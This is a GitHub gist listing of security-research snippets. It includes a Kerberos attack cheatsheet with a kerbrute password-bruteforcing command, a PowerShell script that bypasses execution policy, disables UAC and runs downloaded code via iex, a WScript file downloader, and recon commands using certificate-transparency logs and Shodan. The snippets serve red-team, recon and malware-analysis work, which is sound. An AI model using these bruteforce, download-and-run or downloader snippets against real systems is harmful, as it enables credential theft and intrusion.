Mario macostag

@macostag
macostag / wmic.bat
Created April 11, 2021 02:18
Convert SID to User/Group Name and User to SID
wmic useraccount where name='test_user' get sid
wmic useraccount where (name='test_user' and domain='corp.com') get sid
wmic useraccount where sid='S-1-3-12-12451234567-1234567890-1234567-1434' get name
@macostag
macostag / kerberos_attacks_cheatsheet.md
Created April 5, 2021 00:11 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@macostag
macostag / setup.ps1
Created November 24, 2020 01:15
Chocolatey script to setup Windows 10 malware analysis box.
#Bypass Execution Policy
Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
#Install boxstarter
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://boxstarter.org/bootstrapper.ps1')); Get-Boxstarter -Force
#Disable UAC
Disable-UAC
#Disable Microsoft Update
@macostag
macostag / TH-AS.txt
Last active March 21, 2024 21:12
Threat Hunting & Adversary Simulation
MITRE ATT&CK
------------
MITRE ATT&CK® :
https://attack.mitre.org
Getting Started with ATT&CK: Detection and Analytics :
https://medium.com/mitre-attack/getting-started-with-attack-detection-a8e49e4960d0
Getting Started with ATT&CK: Adversary Emulation and Red Teaming :
https://medium.com/mitre-attack/getting-started-with-attack-red-29f074ccf7e3
@macostag
macostag / xorEnc.py
Created April 12, 2020 23:58
XOR python script.
import os
import struct
import sys
# Single-byte XOR: XOR every character of data with the integer key
def xor(data, key):
    translated = ""
    for ch in data:
        translated += chr(ord(ch) ^ key)
    return translated
@macostag
macostag / testb64Non.py
Last active April 12, 2020 23:57
Encoding and decoding Base64 (Nonstandard Base64 character set)
import base64
chr_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
non_chr_set = "0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz="
encoded = "G6JgP6w="
re_encoded = ""
# Map each character from the nonstandard alphabet back to the standard one
for en_chr in encoded:
    re_encoded += en_chr.replace(en_chr,chr_set[non_chr_set.find(en_chr)])
@macostag
macostag / test.py
Created April 11, 2020 15:04
Encoding and decoding Base64.
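import base64
plain_text = "One"
# b64encode works on bytes, so encode the text first
encoded = base64.b64encode(plain_text.encode("utf-8"))
print(encoded.decode("ascii"))
decoded = base64.b64decode(encoded)
print(decoded.decode("utf-8"))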
@macostag
macostag / ctl.sh
Created February 10, 2020 02:41
Enum via certificate transparency log.
certstream | grep -E "\.org\.com$"
curl -s "https://certspotter.com/api/v0/certs?domain=org.com" | jq .
@macostag
macostag / shodan-net-enum.py
Created February 10, 2020 02:39
Shodan network block enumeration.
from shodan import Shodan
import ipaddress
import pprint
import json
pp = pprint.PrettyPrinter(indent=2)
api = Shodan('')
net = ipaddress.ip_network('')
for xIp in net.hosts():
@macostag
macostag / downloadWS.vbs
Created June 16, 2019 16:05
Downloader WScript.
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("c:\\Windows\\Temp\\file.txt");